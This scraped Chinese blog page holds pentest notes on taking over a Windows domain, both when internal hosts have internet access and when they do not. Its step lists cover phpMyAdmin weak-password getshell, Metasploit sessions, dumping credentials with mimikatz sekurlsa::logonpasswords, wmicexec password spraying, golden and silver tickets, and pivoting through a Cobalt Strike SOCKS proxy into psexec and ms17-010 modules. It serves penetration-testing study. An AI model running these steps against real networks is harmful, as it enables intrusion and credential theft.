2. 程式人生 > 實用技巧 >內網滲透-域內有網和無網

內網滲透-域內有網和無網

阿新 發佈:2020-10-19

文章目錄

前言

在滲透測試的過程中,拿下域內一臺主機以後,有時候內網的其他主機有網,有時候沒網,此時,如果有網我們就按常規的滲透測試即可,如果沒網我們就應該以該主機作為跳板,使用socks協議或其他辦法,從而實現與無網的主機進行通訊

域內主機有網

在這裡插入圖片描述

攻擊流程

通過域環境webserver主機的外網WEB服務開啟到域控許可權的獲取
假如已經獲取webserver許可權:
0x01:

  • 通過phpmyadmin弱口令getshell

0x02:

  • msf生成 msf監聽 getsystem upload ‘/root/x64’ c:\test mimikatz
    privilege::debug sekurlsa::logonpasswords

0x03:

  • 批處理wmicexec測試弱口令 29 31 32 IP存在

0x04:

  • 獲取29 31 32許可權 反彈msf getsystem

0x05

  • 批處理wmicexec測試弱口令 21中標
  • execute -f cmd.exe -H -i 0x06
  • 匯出所有hash 進行黃金白銀票據

域內主機無網

在這裡插入圖片描述
Msf

  • 拿下weserver,發現有兩個網段,192.168.3.31 192.168.230.131
    假設192.168.230.131為外網,192.168.3.31為內網
  • 又發現內網其他主機都沒有聯網,只有webserver聯網了。
  • 此時,可以用webserver作為跳板,用cs開啟socks,並用msf

操作流程

#cobalt strike

  • 啟動,監聽,生成,上線,提權
  • cs啟動sockt4 生成監聽埠跳板,將setg Proxies
  • socks4:192.168.230.133:xxxxx複製到msf

msfconsole

  • 載入代理:setg Proxies socks4:192.168.230.133:xxxxx
  • 攻擊模組:ms17010 ms14068 smb psexec等
  • use exploit/windows/smb/psexec

#自己繫結自己,就實現了無網探針

  • set payload bind_tcp
  • set smbuser administrator
  • set smbpass [email protected]#45
  • 上傳mimikatz:upload ‘/root/x64’ c:\test
  • mimikatz privilege::debug sekurlsa::logonpasswords

相關推薦

滲透-

文章目錄 前言域內主機有網攻擊流程 域內主機無網操作流程 前言 在滲透測試的過程中,拿下域內一臺主機以後,有時候內網的其他主機有網,有時候沒,此時,如果有網我們就按常規的滲透測試即可,如果

滲透-資訊收集

文章目錄 基礎資訊收集查詢查詢所有計算機查詢所有成員計算機列表獲取信任查詢控器查控器的主機名查詢控組

淺談JS陣列建遍歷方法哪些區別

目錄forEach()(ES6)方法map()(ES6) 方法flatMap()方法for...in...for...of...filter(ES6)遍歷陣列every()函式(ES6)find()函式(ES6)findIndex()函式 (ES6)forEach()(ES6)方法

狀態狀態元件

狀態和無狀態元件 元件是自我維持的、獨立的微實體,其描述了UI的一部分,可以將應用程式的UI拆分為較小的元件,其中每個元件都自己的程式碼、結構API,簡單來說元件允許你將UI拆分為獨立可複用的程式碼片段,

arduino串列埠讀取delaydelay的區別

技術標籤:Arduino串列埠讀取arduino String comdata=""; void setup() { Serial.begin(9600); // 設定串列埠波特率為9600

Java在Linux配置環境下的編譯執行(packagepackage時)

技術標籤:javajavalinuxjvm 1.(package時)一個簡單的java程式,程式碼如下: public class myHello{

LINUX設定靜態IP 介面圖形介面兩種方式

介面的LINUX靜態IP網路設定。 在虛擬機器右上角點選有線。再點選設定 在設定中找到網路,點選有線下方的齒輪。

20.channel緩衝緩衝同步問題

1.緩衝 示例程式碼 package chapter15 import ( \"fmt\" \"time\" ) func RunChannel02() { c := make(chan int, 3) // 帶有緩衝的channel

滲透賬戶查詢

滲透賬戶查詢 https://www.cnblogs.com/iAmSoScArEd/p/13874776.html---來自 我超怕的

什麼區別?他們各是什麼意思?

一、內網和的區別 1、範圍大小 區域網(LAN)相對於廣域網(WAN)而言,主要是指在小範圍的計算機網際網路絡。這個“小範圍”可以是一個家庭,一所學校,一家公司,或者是一個政府部門。BT中常常提到的公網、

滲透橫向移動

公眾號:白帽子左一 hash 介紹 在環境中,使用者資訊儲存在控的ntds.dit(C:\\Windows\\NTDS\\NTDS.dit)中;非環境也就是在工作組環境中,當前主機使用者的密碼資訊儲存著在sam檔案(C:\\Windows\\System32\

橫向滲透 之 ATT&CK系列一 之 橫向滲透主機

前言 上一篇文章中已獲取了關於的一些基本資訊,在這裡再整理一下,不知道資訊收集的小夥伴可以看回上一篇文章哦

C#實現獲取本地(區域網)(公網)IP地址的方法分析

本文例項講述了C#實現獲取本地(區域網)(公網)IP地址的方法。分享給大家供大家參考,具體如下:

滲透—流量轉發

0x00前言 在拿到一臺伺服器的shell的時候,如果想要更進一步滲透測試,則需要進行滲透

記一次利用cs進行滲透的過程

記一次利用cs進行滲透的過程 ​首先搭建好cs的服務端客戶端連線,下面正式進行滲透

滲透-dns隧道通訊原理&特徵

1、dns是什麼 DNS是 Domain Name System 的縮寫,也就是 域名解析系統,它的作用非常簡單,就是根據域名查出對應的 IP地址。

史上最強滲透知識點總結

獲取 webshell 進內網 測試主站,搜 wooyun 歷史洞未發現歷史洞,github, svn, 目錄掃描未發現敏感資訊, 無域傳送,埠只開了80埠,找到後臺地址,想爆破後臺,驗證碼後臺驗證,一次性,用 ocr 識別,找賬號,通過 go

滲透tips集合

這篇長期更,陸續記錄我新學習的小技巧,可能接下來很多操作都是大佬教我的,先講一句lsyyyds!

Linux系統如何在離線環境或環境安裝部署Docker服務其他服務

如何在離線環境或純環境的Linux機器上安裝部署Docker服務或其他服務。本次我們以Docker服務Ansible服務為例。

Win10檢視IP地址的方法

最近網友反應,在win10系統中要怎麼檢視IP地址。今天小編便整理了這篇教程來專門講述Win10檢視IP地址的方法,下面小編大家一起來看看檢視的方法!